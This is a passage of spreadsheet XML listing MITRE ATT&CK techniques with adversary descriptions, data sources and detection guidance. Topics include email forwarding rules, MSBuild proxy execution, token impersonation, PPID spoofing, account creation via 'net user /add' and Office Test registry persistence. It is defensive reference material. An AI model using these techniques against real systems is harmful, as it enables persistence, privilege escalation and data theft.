    <t>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correlated with other events to identify malicious activity, depending on the legitimacy of this behavior within a given network environment.</t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>Email Collection</t>
  </si>
  <si>
    <t>Office 365 trace logs,Mail server,Email gateway,Authentication logs,File monitoring,Process monitoring,Process use of network</t>
  </si>
  <si>
    <t>There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
File access of local system email files for Exfiltration, unusual processes connecting to an email server within a network, or unusual access patterns or authentication attempts on a public-facing webmail server may all be indicators of malicious activity.
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Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.
Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include &lt;code&gt;X-MS-Exchange-Organization-AutoForwarded&lt;/code&gt; set to true, &lt;code&gt;X-MailFwdBy&lt;/code&gt; and &lt;code&gt;X-Forwarded-To&lt;/code&gt;. The &lt;code&gt;forwardingSMTPAddress&lt;/code&gt; parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the &lt;code&gt;X-MS-Exchange-Organization-AutoForwarded&lt;/code&gt; header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients. </t>
  </si>
  <si>
    <t>T1114.001</t>
  </si>
  <si>
    <t>Local Email Collection</t>
  </si>
  <si>
    <t>Process monitoring,File monitoring,Authentication logs,Mail server</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to gather local email files. Monitor for unusual processes accessing local email files.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</si>
  <si>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Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
Outlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\Users\&lt;username&gt;\Documents\Outlook Files` or `C:\Users\&lt;username&gt;\AppData\Local\Microsoft\Outlook`.(Citation: Microsoft Outlook Files)</t>
  </si>
  <si>
    <t>T1114.002</t>
  </si>
  <si>
    <t>Remote Email Collection</t>
  </si>
  <si>
    <t>Authentication logs,Email gateway,Mail server,Office 365 trace logs</t>
  </si>
  <si>
    <t>Office 365,Windows</t>
  </si>
  <si>
    <t>Monitor for unusual login activity from unknown or abnormal locations, especially for privileged accounts (ex: Exchange administrator account).</t>
  </si>
  <si>
    <t>Adversaries may target an Exchange server or Office 365 to collect sensitive information. Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services or Office 365 to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413) can be used to automate searches for specific keywords.</t>
  </si>
  <si>
    <t>T1114.003</t>
  </si>
  <si>
    <t>Email Forwarding Rule</t>
  </si>
  <si>
    <t>Process use of network,Process monitoring,Email gateway,Mail server,Office 365 trace logs</t>
  </si>
  <si>
    <t>Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.
Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include `X-MS-Exchange-Organization-AutoForwarded` set to true, `X-MailFwdBy` and `X-Forwarded-To`. The `forwardingSMTPAddress` parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the `X-MS-Exchange-Organization-AutoForwarded` header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.</t>
  </si>
  <si>
    <t>Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email-forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Outlook and Outlook Web App (OWA) allow users to create inbox rules for various email functions, including forwarding to a different recipient. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) 
Any user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more.</t>
  </si>
  <si>
    <t>Clipboard Data</t>
  </si>
  <si>
    <t>Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity.</t>
  </si>
  <si>
    <t>Adversaries may collect data stored in the clipboard from users copying information within or between applications. 
In Windows, Applications can access clipboard data by using the Windows API.(Citation: MSDN Clipboard) OSX provides a native command, &lt;code&gt;pbpaste&lt;/code&gt;, to grab clipboard contents.(Citation: Operating with EmPyre)</t>
  </si>
  <si>
    <t>Automated Collection</t>
  </si>
  <si>
    <t>File monitoring,Data loss prevention,Process command-line parameters</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</si>
  <si>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[Data Staged](https://attack.mitre.org/techniques/T1074).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</si>
  <si>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This functionality could also be built into remote access tools. 
This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files.</t>
  </si>
  <si>
    <t>Peripheral Device Discovery</t>
  </si>
  <si>
    <t>PowerShell logs,API monitoring,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Windows,macOS</t>
  </si>
  <si>
    <t>Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.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t>
  </si>
  <si>
    <t>Audio Capture</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</si>
  <si>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microphone, recording devices, or recording software, and a process periodically writing files to disk that contain audio data.</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</si>
  <si>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</si>
  <si>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System Time Discovery</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,API monitoring</t>
  </si>
  <si>
    <t>Command-line interface monitoring may be useful to detect instances of net.exe or other command-line utilities being used to gather system time or time zone. Methods of detecting API use for gathering this information are likely less useful due to how often they may be used by legitimate software.</t>
  </si>
  <si>
    <t>An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time) (Citation: Technet Windows Time Service)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 (Citation: Technet Windows Time Service) The information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) (Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting.</t>
  </si>
  <si>
    <t>T1125</t>
  </si>
  <si>
    <t>Video Capture</t>
  </si>
  <si>
    <t>Process monitoring,File monitoring,API monitoring</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Trusted Developer Utilities Proxy Execution</t>
  </si>
  <si>
    <t>Monitor for abnormal presence of these or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
Use process monitoring to monitor the execution and arguments of from developer utilities that may be abused. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. It is likely that these utilities will be used by software developers or for other software development related tasks, so if it exists and is used outside of that context, then the event may be suspicious. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.</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</si>
  <si>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engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.</t>
  </si>
  <si>
    <t>Application control</t>
  </si>
  <si>
    <t>T1127.001</t>
  </si>
  <si>
    <t>MSBuild</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of MSBuild.exe. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.</t>
  </si>
  <si>
    <t>Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild)
Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into an XML project file.(Citation: MSDN MSBuild) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)</t>
  </si>
  <si>
    <t>Shared Modules</t>
  </si>
  <si>
    <t>API monitoring,DLL monitoring,File monitoring,Process monitoring</t>
  </si>
  <si>
    <t>Monitoring DLL module loads may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances, since benign use of Windows modules load functions are common and may be difficult to distinguish from malicious behavior. Legitimate software will likely only need to load routine, bundled DLL modules or Windows system DLLs such that deviation from known module loads may be suspicious. Limiting DLL module loads to &lt;code&gt;%SystemRoot%&lt;/code&gt; and &lt;code&gt;%ProgramFiles%&lt;/code&gt; directories will protect against module loads from unsafe paths. 
Correlation of other events with behavior surrounding module loads using API monitoring and suspicious DLLs written to disk will provide additional context to an event that may assist in determining if it is due to malicious behavior.</t>
  </si>
  <si>
    <t>Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like &lt;code&gt;CreateProcess&lt;/code&gt;, &lt;code&gt;LoadLibrary&lt;/code&gt;, etc. of the Win32 API. (Citation: Wikipedia Windows Library Files)
The module loader can load DLLs:
* via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;
* via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);
* via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;
* via &lt;code&gt;&amp;#x3c;file name="filename.extension" loadFrom="fully-qualified or relative pathname"&amp;#x3e;&lt;/code&gt; in an embedded or external "application manifest". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.
Adversaries may use this functionality as a way to execute arbitrary code on a victim system. For example, malware may execute share modules to load additional components or features.</t>
  </si>
  <si>
    <t>Data Encoding</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</si>
  <si>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systems.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.</t>
  </si>
  <si>
    <t>T1132.001</t>
  </si>
  <si>
    <t>Standard Encoding</t>
  </si>
  <si>
    <t>Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.</t>
  </si>
  <si>
    <t>T1132.002</t>
  </si>
  <si>
    <t>Non-Standard Encoding</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) </t>
  </si>
  <si>
    <t>External Remote Services</t>
  </si>
  <si>
    <t>Follow best practices for detecting adversary use of [Valid Accounts](https://attack.mitre.org/techniques/T1078) for authenticating to remote services. Collect authentication logs and analyze for unusual access patterns, windows of activity, and access outside of normal business hours.</t>
  </si>
  <si>
    <t>Adversaries may leverage external-facing remote services to initially access and/or persist within a network. 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Management](https://attack.mitre.org/techniques/T1021/006) can also be used externally.
Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation.</t>
  </si>
  <si>
    <t>persistence,initial-access</t>
  </si>
  <si>
    <t>Access Token Manipulation</t>
  </si>
  <si>
    <t>Authentication logs,Windows event logs,API monitoring,Access tokens,Process monitoring,Process command-line parameters</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</si>
  <si>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There are many Windows API calls a payload can take advantage of to manipulate access tokens (e.g., &lt;code&gt;LogonUser&lt;/code&gt; (Citation: Microsoft LogonUser), &lt;code&gt;DuplicateTokenEx&lt;/code&gt;(Citation: Microsoft DuplicateTokenEx), and &lt;code&gt;ImpersonateLoggedOnUser&lt;/code&gt;(Citation: Microsoft ImpersonateLoggedOnUser)). Please see the referenced Windows API pages for more information.
Query systems for process and thread token information and look for inconsistencies such as user owns processes impersonating the local SYSTEM account.(Citation: BlackHat Atkinson Winchester Token Manipulation)
Look for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.</t>
  </si>
  <si>
    <t>Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These token can then be applied to an existing process (i.e. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001)) or used to spawn a new process (i.e. [Create Process with Token](https://attack.mitre.org/techniques/T1134/002)). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.(Citation: Pentestlab Token Manipulation)
Any standard user can use the &lt;code&gt;runas&lt;/code&gt; command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens.</t>
  </si>
  <si>
    <t>Windows User Account Control,System access controls,File system access controls,Heuristic Detection,Host forensic analysis</t>
  </si>
  <si>
    <t>T1134.001</t>
  </si>
  <si>
    <t>Token Impersonation/Theft</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring,Access tokens,API monitoring</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</si>
  <si>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Analysts can also monitor for use of Windows APIs such as &lt;code&gt;DuplicateToken(Ex)&lt;/code&gt;, &lt;code&gt; ImpersonateLoggedOnUser &lt;/code&gt;, and &lt;code&gt; SetThreadToken &lt;/code&gt; and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.</t>
  </si>
  <si>
    <t>Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using &lt;code&gt;DuplicateToken(Ex)&lt;/code&gt;. The token can then be used with &lt;code&gt;ImpersonateLoggedOnUser&lt;/code&gt; to allow the calling thread to impersonate a logged on user's security context, or with &lt;code&gt;SetThreadToken&lt;/code&gt; to assign the impersonated token to a thread.
An adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system.</t>
  </si>
  <si>
    <t>Windows User Account Control,System access controls,File system access controls</t>
  </si>
  <si>
    <t>T1134.002</t>
  </si>
  <si>
    <t>Create Process with Token</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</si>
  <si>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Analysts can also monitor for use of Windows APIs such as &lt;code&gt;DuplicateToken(Ex)&lt;/code&gt; and &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt; and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.</t>
  </si>
  <si>
    <t>Adversaries may create a new process with a duplicated token to escalate privileges and bypass access controls. An adversary can duplicate a desired access token with &lt;code&gt;DuplicateToken(Ex)&lt;/code&gt; and use it with &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt; to create a new process running under the security context of the impersonated user. This is useful for creating a new process under the security context of a different user.</t>
  </si>
  <si>
    <t>T1134.003</t>
  </si>
  <si>
    <t>Make and Impersonate Token</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</si>
  <si>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Analysts can also monitor for use of Windows APIs such as &lt;code&gt;LogonUser&lt;/code&gt; and &lt;code&gt; SetThreadToken&lt;/code&gt; and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.</t>
  </si>
  <si>
    <t>Adversaries may make and impersonate tokens to escalate privileges and bypass access controls. If an adversary has a username and password but the user is not logged onto the system, the adversary can then create a logon session for the user using the &lt;code&gt;LogonUser&lt;/code&gt; function. The function will return a copy of the new session's access token and the adversary can use &lt;code&gt;SetThreadToken&lt;/code&gt; to assign the token to a thread.</t>
  </si>
  <si>
    <t>T1134.004</t>
  </si>
  <si>
    <t>Parent PID Spoofing</t>
  </si>
  <si>
    <t>API monitoring,Process monitoring,Windows event logs</t>
  </si>
  <si>
    <t>Look for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.(Citation: CounterCept PPID Spoofing Dec 2018)
Monitor and analyze API calls to &lt;code&gt;CreateProcess&lt;/code&gt;/&lt;code&gt;CreateProcessA&lt;/code&gt;, specifically those from user/potentially malicious processes and with parameters explicitly assigning PPIDs (ex: the Process Creation Flags of 0x8XXX, indicating that the process is being created with extended startup information(Citation: Microsoft Process Creation Flags May 2018)). Malicious use of &lt;code&gt;CreateProcess&lt;/code&gt;/&lt;code&gt;CreateProcessA&lt;/code&gt; may also be proceeded by a call to &lt;code&gt;UpdateProcThreadAttribute&lt;/code&gt;, which may be necessary to update process creation attributes.(Citation: Secuirtyinbits Ataware3 May 2019) This may generate false positives from normal UAC elevation behavior, so compare to a system baseline/understanding of normal system activity if possible.</t>
  </si>
  <si>
    <t>Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the &lt;code&gt;CreateProcess&lt;/code&gt; API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via &lt;code&gt;svchost.exe&lt;/code&gt; or &lt;code&gt;consent.exe&lt;/code&gt;) rather than the current user context.(Citation: Microsoft UAC Nov 2018)
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1086)/[Rundll32](https://attack.mitre.org/techniques/T1085) to be &lt;code&gt;explorer.exe&lt;/code&gt; rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as &lt;code&gt;lsass.exe&lt;/code&gt;), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)</t>
  </si>
  <si>
    <t>Heuristic Detection,Host forensic analysis</t>
  </si>
  <si>
    <t>T1134.005</t>
  </si>
  <si>
    <t>SID-History Injection</t>
  </si>
  <si>
    <t>Windows event logs,Authentication logs,API monitoring</t>
  </si>
  <si>
    <t>Examine data in user’s SID-History attributes using the PowerShell &lt;code&gt;Get-ADUser&lt;/code&gt; cmdlet (Citation: Microsoft Get-ADUser), especially users who have SID-History values from the same domain. (Citation: AdSecurity SID History Sept 2015) Also monitor account management events on Domain Controllers for successful and failed changes to SID-History. (Citation: AdSecurity SID History Sept 2015) (Citation: Microsoft DsAddSidHistory)
Monitor for Windows API calls to the &lt;code&gt;DsAddSidHistory&lt;/code&gt; function. (Citation: Microsoft DsAddSidHistory)</t>
  </si>
  <si>
    <t>Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
With Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: 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Services](https://attack.mitre.org/techniques/T1021), [Windows Admin Shares](https://attack.mitre.org/techniques/T1077), or [Windows Remote Management](https://attack.mitre.org/techniques/T1028).</t>
  </si>
  <si>
    <t>Network Share Discovery</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,Network protocol analysis,Process use of network</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</si>
  <si>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t>
  </si>
  <si>
    <t>Create Account</t>
  </si>
  <si>
    <t>Office 365 account logs,Azure activity logs,AWS CloudTrail logs,Process monitoring,Process command-line parameters,Authentication logs,Windows event logs</t>
  </si>
  <si>
    <t>Linux,macOS,Windows,AWS,GCP,Azure AD,Azure,Office 365</t>
  </si>
  <si>
    <t>Monitor for processes and command-line parameters associated with account creation, such as &lt;code&gt;net user&lt;/code&gt; or &lt;code&gt;useradd&lt;/code&gt;. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system and domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain and local system accounts to detect suspicious accounts that may have been created by an adversary.
Collect usage logs from cloud administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.</t>
  </si>
  <si>
    <t>Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Accounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.</t>
  </si>
  <si>
    <t>T1136.001</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,Authentication logs,Windows event logs</t>
  </si>
  <si>
    <t>Monitor for processes and command-line parameters associated with local account creation, such as &lt;code&gt;net user /add&lt;/code&gt; or &lt;code&gt;useradd&lt;/code&gt;. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system. (Citation: Microsoft User Creation Event) Perform regular audits of local system accounts to detect suspicious accounts that may have been created by an adversary.</t>
  </si>
  <si>
    <t>Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the &lt;code&gt;net user /add&lt;/code&gt; command can be used to create a local account.
Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.</t>
  </si>
  <si>
    <t>T1136.002</t>
  </si>
  <si>
    <t>Monitor for processes and command-line parameters associated with domain account creation, such as &lt;code&gt;net user /add /domain&lt;/code&gt;. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain accounts to detect suspicious accounts that may have been created by an adversary.</t>
  </si>
  <si>
    <t>Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the &lt;code&gt;net user /add /domain&lt;/code&gt; command can be used to create a domain account.
Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.</t>
  </si>
  <si>
    <t>T1136.003</t>
  </si>
  <si>
    <t>Office 365 audit logs,Stackdriver logs,Azure activity logs,AWS CloudTrail logs</t>
  </si>
  <si>
    <t>AWS,GCP,Azure,Office 365,Azure AD</t>
  </si>
  <si>
    <t>Collect usage logs from cloud user and administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.</t>
  </si>
  <si>
    <t>Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.</t>
  </si>
  <si>
    <t>Office Application Startup</t>
  </si>
  <si>
    <t>Mail server,Process monitoring,Process command-line parameters,Windows Registry,File monitoring</t>
  </si>
  <si>
    <t>Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
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persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1137.001</t>
  </si>
  <si>
    <t>Office Template Macros</t>
  </si>
  <si>
    <t>Windows Registry,Process monitoring,Process command-line parameters,File monitoring</t>
  </si>
  <si>
    <t>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persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page) Modification to base templates, like Normal.dotm, should also be investigated since the base templates should likely not contain VBA macros. Changes to the Office macro security settings should also be investigated.(Citation: GlobalDotName Jun 2019)</t>
  </si>
  <si>
    <t>Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system.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be inserted into the base template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loaded.(Citation: enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates may also be stored and pulled from remote locations.(Citation: GlobalDotName Jun 2019) 
Word Normal.dotm location:&lt;br&gt;
&lt;code&gt;C:\Users\&amp;lt;username&amp;gt;\AppData\Roaming\Microsoft\Templates\Normal.dotm&lt;/code&gt;
Excel Personal.xlsb location:&lt;br&gt;
&lt;code&gt;C:\Users\&amp;lt;username&amp;gt;\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB&lt;/code&gt;
Adversaries may also change the location of the base template to point to their own by hijacking the application's search order, e.g. Word 2016 will first look for Normal.dotm under &lt;code&gt;C:\Program Files (x86)\Microsoft Office\root\Office16\&lt;/code&gt;, or by modifying the GlobalDotName registry key. By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup. To abuse GlobalDotName, adversaries may first need to register the template as a trusted document or place it in a trusted location.(Citation: GlobalDotName Jun 2019) 
An adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.</t>
  </si>
  <si>
    <t>T1137.002</t>
  </si>
  <si>
    <t>Office Test</t>
  </si>
  <si>
    <t>DLL monitoring,Loaded DLLs,Process monitoring,Process command-line parameters,File monitoring,Windows Registry</t>
  </si>
  <si>
    <t>Monitor for the creation of the Office Test Registry key. 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 Since v13.52, Autoruns can detect tasks set up using the Office Test Registry key.(Citation: Palo Alto Office Test Sofacy)
Consider monitoring Office processes for anomalous DLL loads.</t>
  </si>
  <si>
    <t>Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)
There exist user and global Registry keys for the Office Test feature:
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf&lt;/code&gt;
Adversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started.</t>
  </si>
  <si>
    <t>T1137.003</t>
  </si>
  <si>
    <t>Outlook Forms</t>
  </si>
  <si>
    <t>Mail server,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
